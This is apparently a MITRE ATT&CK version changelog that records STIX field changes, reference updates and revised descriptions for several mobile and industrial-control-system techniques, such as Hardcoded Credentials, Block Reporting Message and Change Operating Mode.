STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAlex Cambell. (2016, February 12). Everything you need to know about SIM swap scams. Retrieved December 12, 2016.
external_referencesSTA-22
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1054
external_referencesSTA-22
external_referencesJohn Biggs. (2017, August 23). I was hacked. Retrieved November 8, 2018.
values_changed
STIX FieldOld valueNew Value
modified2021-09-30 18:45:26.323000+00:002022-04-06 15:53:54.872000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueBetanews-Simswap
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-22.htmlhttp://betanews.com/2016/02/12/everything-you-need-to-know-about-sim-swap-scams/
external_references[2]['source_name']NYGov-SimswapKrebs-SimSwap
external_references[2]['description']New York Department of State. (2016, February 12). AT&T SIM-Card Switch Scam. Retrieved August 23, 2016.Brian Krebs. (2018, May 18). T-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account. Retrieved November 8, 2018.
external_references[2]['url']http://www.dos.ny.gov/consumerprotection/scams/att-sim.htmlhttps://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/
external_references[3]['source_name']Motherboard-Simswap2TechCrunch-SimSwap
external_references[3]['description']Lorenzo Franceschi-Bicchierai. (2018, August 3). How Criminals Recruit Telecom Employees to Help Them Hijack SIM Cards. Retrieved August 11, 2018.John Biggs. (2017, August 23). I was hacked. Retrieved November 8, 2018.
external_references[3]['url']https://motherboard.vice.com/en_us/article/3ky5a5/criminals-recruit-telecom-employees-sim-swapping-port-out-scamhttps://techcrunch.com/2017/08/23/i-was-hacked/
external_references[4]['source_name']Betanews-SimswapMotherboard-Simswap2
external_references[4]['description']Alex Cambell. (2016, February 12). Everything you need to know about SIM swap scams. Retrieved December 12, 2016.Lorenzo Franceschi-Bicchierai. (2018, August 3). How Criminals Recruit Telecom Employees to Help Them Hijack SIM Cards. Retrieved August 11, 2018.
external_references[4]['url']http://betanews.com/2016/02/12/everything-you-need-to-know-about-sim-swap-scams/https://motherboard.vice.com/en_us/article/3ky5a5/criminals-recruit-telecom-employees-sim-swapping-port-out-scam
external_references[5]['source_name']Guardian-SimswapMotherboard-Simswap1
external_references[5]['description']Miles Brignall. (2016, April 16). Sim-swap fraud claims another mobile banking victim. Retrieved December 12, 2016.Lorenzo Franceschi-Bicchierai. (2018, July 17). The SIM Hijackers. Retrieved August 11, 2018.
external_references[5]['url']https://www.theguardian.com/money/2016/apr/16/sim-swap-fraud-mobile-banking-fraudstershttps://motherboard.vice.com/en_us/article/vbqax3/hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin
external_references[6]['source_name']Motherboard-Simswap1Guardian-Simswap
external_references[6]['description']Lorenzo Franceschi-Bicchierai. (2018, July 17). The SIM Hijackers. Retrieved August 11, 2018.Miles Brignall. (2016, April 16). Sim-swap fraud claims another mobile banking victim. Retrieved December 12, 2016.
external_references[6]['url']https://motherboard.vice.com/en_us/article/vbqax3/hackers-sim-swapping-steal-phone-numbers-instagram-bitcoinhttps://www.theguardian.com/money/2016/apr/16/sim-swap-fraud-mobile-banking-fraudsters
external_references[7]['source_name']Krebs-SimSwapNYGov-Simswap
external_references[7]['description']Brian Krebs. (2018, May 18). T-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account. Retrieved November 8, 2018.New York Department of State. (2016, February 12). AT&T SIM-Card Switch Scam. Retrieved August 23, 2016.
external_references[7]['url']https://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/http://www.dos.ny.gov/consumerprotection/scams/att-sim.html
external_references[8]['source_name']TechCrunch-SimSwapNIST Mobile Threat Catalogue
external_references[8]['url']https://techcrunch.com/2017/08/23/i-was-hacked/https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-22.html

ics-attack

New Techniques

[T0891] Hardcoded Credentials

Current version: 1.0

Description: Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset. Examples credentials that may be hardcoded in an asset include: * Username/Passwords * Cryptographic keys/Certificates * API tokens Unlike [Default Credentials](https://attack.mitre.org/techniques/T0812), these credentials are built into the system in a way that they either cannot be changed by the asset owner, or may be infeasible to change because of the impact it would cause to the control system operation. These credentials may be reused across whole product lines or device models and are often not published or known to the owner and operators of the asset. Adversaries may utilize these hardcoded credentials to move throughout the control system environment or provide reliable access for their tools to interact with industrial assets.

Major Version Changes

[T0800] Activate Firmware Update Mode

Current version: 1.0

Version changed from: 0.0 → 1.0

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:14:01.612000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0800https://attack.mitre.org/techniques/T0800

[T0802] Automated Collection

Current version: 1.0

Version changed from: 0.0 → 1.0

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 13:04:01.612000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0802https://attack.mitre.org/techniques/T0802

[T0803] Block Command Message

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may block a command message from reaching its int1Adversaries may block a command message from reaching its in
>tended target to prevent command execution. In OT networks, >tended target to prevent command execution. In OT networks, 
>command messages are sent to provide instructions to control>command messages are sent to provide instructions to control
> system devices. A blocked command message can inhibit respo> system devices. A blocked command message can inhibit respo
>nse functions from correcting a disruption or unsafe conditi>nse functions from correcting a disruption or unsafe conditi
>on.(Citation: Research - Research - Taxonomy Cyber Attacks o>on. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 20
>n SCADA)(Citation: Ukraine15 - EISAC - 201603)>11)  (Citation: Electricity Information Sharing and Analysis
 > Center; SANS Industrial Control Systems March 2016)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 13:04:01.612000+00:002022-10-24 15:09:07.609000+00:00
descriptionAdversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition.(Citation: Research - Research - Taxonomy Cyber Attacks on SCADA)(Citation: Ukraine15 - EISAC - 201603)Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0803https://attack.mitre.org/techniques/T0803
external_references[1]['source_name']Research - Research - Taxonomy Cyber Attacks on SCADABonnie Zhu, Anthony Joseph, Shankar Sastry 2011
external_references[1]['description']Bonnie Zhu, Anthony Joseph, Shankar Sastry. (2011). A Taxonomy of Cyber Attacks on SCADA Systems. Retrieved January 12, 2018.Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12
external_references[2]['source_name']Ukraine15 - EISAC - 201603Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016
external_references[2]['description']Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems. (2016, March 18). Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case. Retrieved March 27, 2018.Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27
external_references[2]['url']https://ics.sans.org/media/E-ISAC%20SANS%20Ukraine%20DUC%205.pdfhttps://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf

[T0804] Block Reporting Message

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may block or prevent a reporting message from ret1Adversaries may block or prevent a reporting message from re
>aching its intended target. In control systems, reporting me>aching its intended target. In control systems, reporting me
>ssages contain telemetry data (e.g., I/O values) pertaining >ssages contain telemetry data (e.g., I/O values) pertaining 
>to the current state of equipment and the industrial process>to the current state of equipment and the industrial process
>. By blocking these reporting messages, an adversary can pot>. By blocking these reporting messages, an adversary can pot
>entially hide their actions from an operator. Blocking repor>entially hide their actions from an operator.  Blocking repo
>ting messages in control systems that manage physical proces>rting messages in control systems that manage physical proce
>ses may contribute to system impact, causing inhibition of a>sses may contribute to system impact, causing inhibition of 
> response function. A control system may not be able to resp>a response function. A control system may not be able to res
>ond in a proper or timely manner to an event, such as a dang>pond in a proper or timely manner to an event, such as a dan
>erous fault, if its corresponding reporting message is block>gerous fault, if its corresponding reporting message is bloc
>ed.(Citation: Research - Research - Taxonomy Cyber Attacks o>ked. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2
>n SCADA)(Citation: Ukraine15 - EISAC - 201603)>011)  (Citation: Electricity Information Sharing and Analysi
 >s Center; SANS Industrial Control Systems March 2016)

Dropped Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 13:04:01.612000+00:002022-09-19 13:57:23.538000+00:00
descriptionAdversaries may block or prevent a reporting message from reaching its intended target. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. By blocking these reporting messages, an adversary can potentially hide their actions from an operator. Blocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked.(Citation: Research - Research - Taxonomy Cyber Attacks on SCADA)(Citation: Ukraine15 - EISAC - 201603)Adversaries may block or prevent a reporting message from reaching its intended target. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. By blocking these reporting messages, an adversary can potentially hide their actions from an operator. Blocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0804https://attack.mitre.org/techniques/T0804
external_references[1]['source_name']Research - Research - Taxonomy Cyber Attacks on SCADABonnie Zhu, Anthony Joseph, Shankar Sastry 2011
external_references[1]['description']Bonnie Zhu, Anthony Joseph, Shankar Sastry. (2011). A Taxonomy of Cyber Attacks on SCADA Systems. Retrieved January 12, 2018.Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12
external_references[2]['source_name']Ukraine15 - EISAC - 201603Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016
external_references[2]['description']Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems. (2016, March 18). Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case. Retrieved March 27, 2018.Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27
external_references[2]['url']https://ics.sans.org/media/E-ISAC%20SANS%20Ukraine%20DUC%205.pdfhttps://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf

[T0806] Brute Force I/O

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may repetitively or successively change I/O point1Adversaries may repetitively or successively change I/O poin
>t values to perform an action. Brute Force I/O may be achiev>t values to perform an action. Brute Force I/O may be achiev
>ed by changing either a range of I/O point values or a singl>ed by changing either a range of I/O point values or a singl
>e point value repeatedly to manipulate a process function. T>e point value repeatedly to manipulate a process function. T
>he adversary’s goal and the information they have about the >he adversarys goal and the information they have about the t
>target environment will influence which of the options they >arget environment will influence which of the options they c
>choose. In the case of brute forcing a range of point values>hoose. In the case of brute forcing a range of point values,
>, the adversary may be able to achieve an impact without tar> the adversary may be able to achieve an impact without targ
>geting a specific point. In the case where a single point is>eting a specific point. In the case where a single point is 
> targeted, the adversary may be able to generate instability>targeted, the adversary may be able to generate instability 
> on the process function associated with that particular poi>on the process function associated with that particular poin
>nt.  Adversaries may use Brute Force I/O to cause failures w>t.   Adversaries may use Brute Force I/O to cause failures w
>ithin various industrial processes. These failures could be >ithin various industrial processes. These failures could be 
>the result of wear on equipment, or damage to downstream equ>the result of wear on equipment or damage to downstream equi
>ipment.>pment.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 13:04:01.612000+00:002022-09-20 19:28:07.225000+00:00
descriptionAdversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary’s goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point. Adversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment, or damage to downstream equipment.Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversarys goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point. Adversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment or damage to downstream equipment.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0806https://attack.mitre.org/techniques/T0806

[T0858] Change Operating Mode

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries Adversaries may change the operating mode of a ct1Adversaries may change the operating mode of a controller to
>ontroller to gain additional access to engineering functions> gain additional access to engineering functions such as Pro
> such as Program Download. Programmable controllers typicall>gram Download.   Programmable controllers typically have sev
>y have several modes of operation that control the state of >eral modes of operation that control the state of the user p
>the user program and control access to the controller’s API.>rogram and control access to the controllers API. Operating 
> Operating modes can be physically selected using a key swit>modes can be physically selected using a key switch on the f
>ch on the face of the controller but may also be selected wi>ace of the controller but may also be selected with calls to
>th calls to the controller’s API. Operating modes and the me> the controllers API. Operating modes and the mechanisms by 
>chanisms by which they are selected often vary by vendor and>which they are selected often vary by vendor and product lin
> product line. Some commonly implemented operating modes are>e. Some commonly implemented operating modes are described b
> described below: Program - This mode must be enabled before>elow:    * Program - This mode must be enabled before change
> changes can be made to a device’s program. This allows prog>s can be made to a devices program. This allows program uplo
>ram uploads and downloads between the device and an engineer>ads and downloads between the device and an engineering work
>ing workstation. Often the PLC’s logic Is halted, and all ou>station. Often the PLCs logic Is halted, and all outputs may
>tputs may be forced off.(Citation: Forum Automation PLC Oper> be forced off. (Citation: N.A. October 2017)   * Run - Exec
>ating Modes October 2017) Run - Execution of the device’s pr>ution of the devices program occurs in this mode. Input and 
>ogram occurs in this mode. Input and output (values, points,>output (values, points, tags, elements, etc.) are monitored 
> tags, elements, etc.) are monitored and used according to t>and used according to the programs logic. [Program Upload](h
>he program’s logic. Program Upload and Program Download are >ttps://attack.mitre.org/techniques/T0845) and [Program Downl
>disabled while in this mode.(Citation: Omrom PLC Different O>oad](https://attack.mitre.org/techniques/T0843) are disabled
>perating Modes)(Citation: Machine Information Systems How PL> while in this mode. (Citation: Omron) (Citation: Machine In
>Cs Work 2007)(Citation: Forum Automation PLC Operating Modes>formation Systems 2007)  (Citation: N.A. October 2017) (Cita
> October 2017)(Citation: PLCgurus PLC Basics 2021) Remote - >tion: PLCgurus 2021)    * Remote - Allows for remote changes
>Allows for remote changes to a PLC’s operation mode.(Citatio> to a PLCs operation mode. (Citation: PLCgurus 2021)     * S
>n: PLCgurus PLC Basics 2021) Stop - The PLC and program is s>top - The PLC and program is stopped, while in this mode, ou
>topped, while in this mode, outputs are forced off.(Citation>tputs are forced off. (Citation: Machine Information Systems
>: Machine Information Systems How PLCs Work 2007) Reset - Co> 2007)    * Reset - Conditions on the PLC are reset to their
>nditions on the PLC are reset to their original states. Warm> original states. Warm resets may retain some memory while c
> resets may retain some memory while cold resets will reset >old resets will reset all I/O and data registers. (Citation:
>all I/O and data registers.(Citation: Machine Information Sy> Machine Information Systems 2007)    * Test / Monitor mode 
>stems How PLCs Work 2007)Test / Monitor mode - Similar to ru>- Similar to run mode, I/O is processed, although this mode 
>n mode, I/O is processed, although this mode allows for moni>allows for monitoring, force set, resets, and more generally
>toring, force set, resets, and more generally tuning or debu> tuning or debugging of the system. Often monitor mode may b
>gging of the system. Often monitor mode may be used as a tri>e used as a trial for initialization. (Citation: Omron)
>al for initialization.(Citation: Omrom PLC Different Operati 
>ng Modes) 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 13:04:01.612000+00:002022-05-24 11:42:52.057000+00:00
descriptionAdversaries Adversaries may change the operating mode of a controller to gain additional access to engineering functions such as Program Download. Programmable controllers typically have several modes of operation that control the state of the user program and control access to the controller’s API. Operating modes can be physically selected using a key switch on the face of the controller but may also be selected with calls to the controller’s API. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: Program - This mode must be enabled before changes can be made to a device’s program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLC’s logic Is halted, and all outputs may be forced off.(Citation: Forum Automation PLC Operating Modes October 2017) Run - Execution of the device’s program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the program’s logic. Program Upload and Program Download are disabled while in this mode.(Citation: Omrom PLC Different Operating Modes)(Citation: Machine Information Systems How PLCs Work 2007)(Citation: Forum Automation PLC Operating Modes October 2017)(Citation: PLCgurus PLC Basics 2021) Remote - Allows for remote changes to a PLC’s operation mode.(Citation: PLCgurus PLC Basics 2021) Stop - The PLC and program is stopped, while in this mode, outputs are forced off.(Citation: Machine Information Systems How PLCs Work 2007) Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers.(Citation: Machine Information Systems How PLCs Work 2007)Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization.(Citation: Omrom PLC Different Operating Modes)Adversaries may change the operating mode of a controller to gain additional access to engineering functions such as Program Download. Programmable controllers typically have several modes of operation that control the state of the user program and control access to the controllers API. Operating modes can be physically selected using a key switch on the face of the controller but may also be selected with calls to the controllers API. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: * Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) * Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic. [Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) * Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) * Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) * Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) * Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0858https://attack.mitre.org/techniques/T0858
external_references[1]['source_name']Forum Automation PLC Operating Modes October 2017Machine Information Systems 2007
external_references[1]['description']N.A.. (2017, October). What are the different operating modes in PLC?. Retrieved January 28, 2021.Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28
external_references[1]['url']https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489http://www.machine-information-systems.com/How_PLCs_Work.html
external_references[2]['source_name']Omrom PLC Different Operating ModesN.A. October 2017
external_references[2]['description']Omron. (n.d.). PLC Different Operating Modes. Retrieved January 28, 2021.N.A. 2017, October What are the different operating modes in PLC? Retrieved. 2021/01/28
external_references[2]['url']https://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified.https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489
external_references[3]['source_name']Machine Information Systems How PLCs Work 2007Omron
external_references[3]['description']Machine Information Systems. (2007). How PLCs Work. Retrieved January 28, 2021.Omron Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 PLC Different Operating Modes Retrieved. 2021/01/28
external_references[3]['url']http://www.machine-information-systems.com/How_PLCs_Work.htmlhttps://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified.
external_references[4]['source_name']PLCgurus PLC Basics 2021PLCgurus 2021
external_references[4]['description']PLCgurus. (2021). PLC Basics – Modes Of Operation. Retrieved January 28, 2021.PLCgurus 2021 PLC Basics Modes Of Operation Retrieved. 2021/01/28

[T0879] Damage to Property

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may cause damage and destruction of property to t1Adversaries may cause damage and destruction of property to 
>infrastructure, equipment, and the surrounding environment w>infrastructure, equipment, and the surrounding environment w
>hen attacking control systems. This technique may result in >hen attacking control systems. This technique may result in 
>device and operational equipment breakdown, or represent tan>device and operational equipment breakdown, or represent tan
>gential damage from other techniques used in an attack. Depe>gential damage from other techniques used in an attack. Depe
>nding on the severity of physical damage and disruption caus>nding on the severity of physical damage and disruption caus
>ed to control processes and systems, this technique may resu>ed to control processes and systems, this technique may resu
>lt in <span class="smw-format list-format "><span class="smw>lt in [Loss of Safety](https://attack.mitre.org/techniques/T
>-row"><span class="smw-field"><span class="smw-value">Loss o>0880). Operations that result in [Loss of Control](https://a
>f Safety</span></span></span></span>. Operations that result>ttack.mitre.org/techniques/T0827) may also cause damage to p
> in <span class="smw-format list-format "><span class="smw-r>roperty, which may be directly or indirectly motivated by an
>ow"><span class="smw-field"><span class="smw-value">Loss of > adversary seeking to cause impact in the form of [Loss of P
>Control</span></span></span></span> may also cause damage to>roductivity and Revenue](https://attack.mitre.org/techniques
> property, which may be directly or indirectly motivated by >/T0828).   In the Maroochy Shire attack, the adversary gaine
>an adversary seeking to cause impact in the form of <span cl>d remote computer access to the control system and altered d
>ass="smw-format list-format "><span class="smw-row"><span cl>ata so that whatever function should have occurred at affect
>ass="smw-field"><span class="smw-value">Loss of Productivity>ed pumping stations did not occur or occurred in a different
> and Revenue</span></span></span></span>.   The German Feder> way. This ultimately led to 800,000 liters of raw sewage be
>al Office for Information Security (BSI) reported a targeted>ing spilled out into the community. The raw sewage affected 
> attack on a steel mill under an incidents affecting busines>local parks, rivers, and even a local hotel. This resulted i
>s section of its 2014 IT Security Report. (Citation: German >n harm to marine life and produced a sickening stench from t
>Steel Mill - German Federal Office for Information Security >he community's now blackened rivers.(Citation: Marshall Abra
>- 2014) These targeted attacks affected industrial operation>ms July 2008)  The German Federal Office for Information Sec
>s and resulted in breakdowns of control system components an>urity (BSI) reported a targeted attack on a steel mill under
>d even entire installations. As a result of these breakdowns> an incidents affecting business section of its 2014 IT Secu
>, massive impact and damage resulted from the uncontrolled s>rity Report. (Citation: BSI State of IT Security 2014)  Thes
>hutdown of a blast furnace.  In the Maroochy Attack, Vitek B>e targeted attacks affected industrial operations and result
>oden gained remote computer access to the control system and>ed in breakdowns of control system components and even entir
> altered data so that whatever function should have occurred>e installations. As a result of these breakdowns, massive im
> at affected pumping stations did not occur or occurred in a>pact and damage resulted from the uncontrolled shutdown of a
> different way. This ultimately led to 800,000 liters of raw> blast furnace.   A Polish student used a remote controller 
> sewage being spilled out into the community. The raw sewage>device to interface with the Lodz city tram system in Poland
> affected local parks, rivers, and even a local hotel. This >. (Citation: John Bill May 2017) (Citation: Shelley Smith Fe
>resulted in harm to marine life and produced a sickening ste>bruary 2008) (Citation: Bruce Schneier January 2008) Using t
>nch from the community's now blackened rivers. (Citation: Ma>his remote, the student was able to capture and replay legit
>roochy - MITRE - 200808)  A Polish student used a remote con>imate tram signals. This resulted in damage to impacted tram
>troller device to interface with the Lodz city tram system i>s, people, and the surrounding property. Reportedly, four tr
>n Poland. (Citation: LodzTram-LondonReconnections-2017-12) (>ams were derailed and were forced to make emergency stops. (
>Citation: LodzTram-InHomelandSecurity-2008-02) (Citation: Lo>Citation: Shelley Smith February 2008) Commands issued by th
>dzTram-Schneier-2008-01) Using this remote, the student was >e student may have also resulted in tram collisions, causing
>able to capture and replay legitimate tram signals. This res> harm to those on board and the environment outside. (Citati
>ulted in damage to impacted trams, people, and the surroundi>on: Bruce Schneier January 2008)
>ng property. Reportedly, four trams were derailed and were f 
>orced to make emergency stops. (Citation: LodzTram-InHomelan 
>dSecurity-2008-02) Commands issued by the student may have a 
>lso resulted in tram collisions, causing harm to those on bo 
>ard and the environment outside. (Citation: LodzTram-Schneie 
>r-2008-01) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 13:04:01.612000+00:002022-10-20 18:12:38.570000+00:00
descriptionAdversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in Loss of Safety. Operations that result in Loss of Control may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of Loss of Productivity and Revenue. The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. (Citation: German Steel Mill - German Federal Office for Information Security - 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. The raw sewage affected local parks, rivers, and even a local hotel. This resulted in harm to marine life and produced a sickening stench from the community's now blackened rivers. (Citation: Maroochy - MITRE - 200808) A Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: LodzTram-LondonReconnections-2017-12) (Citation: LodzTram-InHomelandSecurity-2008-02) (Citation: LodzTram-Schneier-2008-01) Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops. (Citation: LodzTram-InHomelandSecurity-2008-02) Commands issued by the student may have also resulted in tram 